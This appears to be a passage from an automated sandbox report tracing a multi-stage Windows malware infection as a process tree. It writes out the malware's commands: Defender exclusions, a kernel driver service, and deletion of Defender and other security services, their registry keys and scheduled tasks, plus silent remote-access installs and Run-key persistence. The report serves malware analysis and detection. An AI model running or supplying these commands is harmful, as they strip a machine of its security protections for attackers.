        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5056
      - C:\Users\Admin\AppData\Local\Temp\10374380101\7d5ce09794.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10374380101\7d5ce09794.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:972
        
        C:\Users\Admin\AppData\Local\Temp\221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\221.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2512
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1FD7.tmp\1FD8.tmp\1FD9.bat C:\Users\Admin\AppData\Local\Temp\221.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3012
        
        C:\Users\Admin\AppData\Local\Temp\221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\221.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3856
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\20B2.tmp\20B3.tmp\20B4.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"
        10⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:4804
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:4500
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:872
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:3208
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:3440
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:2172
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3476
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4568
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:3196
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:3816
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:2252
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:1656
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:4548
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:2064
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:2648
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:440
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:4324
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        
        PID:1440
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:1452
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:212
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:1040
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:3748
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
        PID:2960
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:752
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:4320
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:4308
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:836
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        
        PID:644
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:2400
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        
        PID:1804
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:1300
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:3588
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:3348
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:2580
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:1036
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:4500
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:3168
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:660
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:4528
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:3180
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:316
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:4972
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:4864
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:3972
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:4028
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        
        PID:1596
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:4716
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:4840
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:1324
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:1956
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:4128
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:1228
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:676
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:1876
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:2864
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:2020
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:3968
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:1424
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:4296
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:2236
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:4504
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:2148
      - C:\Users\Admin\AppData\Local\Temp\10375600101\A9cowK5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10375600101\A9cowK5.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2544
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"
        7⤵
        Enumerates connected drives
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:3480
      - C:\Users\Admin\AppData\Local\Temp\10378550101\kO2IdCz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10378550101\kO2IdCz.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:212
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c 67e8f4de3ad1d.vbs
        7⤵
        Checks computer location settings
        Modifies registry class
        
        PID:3076
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e8f4de3ad1d.vbs"
        8⤵
        
        PID:3348
      - C:\Users\Admin\AppData\Local\Temp\10378830101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10378830101\apple.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\221.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2252
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7C4F.tmp\7C60.tmp\7C61.bat C:\Users\Admin\AppData\Local\Temp\221.exe"
        8⤵
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\221.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2148
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7D0B.tmp\7D0C.tmp\7D0D.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"
        10⤵
        Drops file in Program Files directory
        
        PID:4128
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:3892
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        
        PID:4196
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:5012
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:4968
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:232
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4308
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4320
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:1244
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:2568
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:1300
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:1388
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        
        PID:2896
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:2512
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:5060
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:1816
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:4452
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:3012
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:4632
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:444
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        
        PID:4056
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        
        PID:1284
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        
        PID:4408
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        
        PID:1556
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:2288
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:3668
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:5028
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        
        PID:1484
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:1044
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        
        PID:3664
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:4972
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:2332
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:1876
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:3816
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:3752
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:4028
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:2864
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:540
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        
        PID:440
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:2648
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:1440
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:4504
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:4324
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:4980
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:3092
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:3204
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:4624
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:3596
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:5040
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:5012
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:4968
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:3488
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:752
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:4320
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:4008
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:2568
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:1300
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:1388
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:3016
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:3616
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:4788
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:4452
      - C:\Users\Admin\AppData\Local\Temp\10380220101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10380220101\amnew.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:3752
        
        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        7⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:4324
        
        C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1332
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3004
        
        C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        8⤵
        Executes dropped EXE
        
        PID:2824
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:3816
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1764
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:444
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\is-R9EHL.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-R9EHL.tmp\Bell_Setup16.tmp" /SL5="$B02D0,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3196
        
        C:\Users\Admin\AppData\Local\Temp\is-MA2DI.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-MA2DI.tmp\Bell_Setup16.tmp" /SL5="$1101EA,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        11⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:2512
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
        12⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        
        "PowerShell.exe" -NoProfile -NonInteractive -Command -
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:1496
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:1456
        
        C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
        8⤵
        Executes dropped EXE
        
        PID:5192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5640
        
        C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
        
        C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
        9⤵
        Executes dropped EXE
        
        PID:6312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6348
        
        C:\Users\Admin\AppData\Local\Temp\10045200101\50981a7f32.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10045200101\50981a7f32.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:7060
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10045200101\50981a7f32.exe"
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6500
        
        C:\Users\Admin\AppData\Local\Temp\10045210101\8ffa067850.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10045210101\8ffa067850.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:6540
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10045210101\8ffa067850.exe"
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6712
        
        C:\Users\Admin\AppData\Local\Temp\10045220101\e269e6c0d6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10045220101\e269e6c0d6.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5980
      - C:\Users\Admin\AppData\Local\Temp\10380550101\e9ea3a76fa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10380550101\e9ea3a76fa.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2880
      - C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe"
        6⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NP4kBrG.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\smss.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2148
        
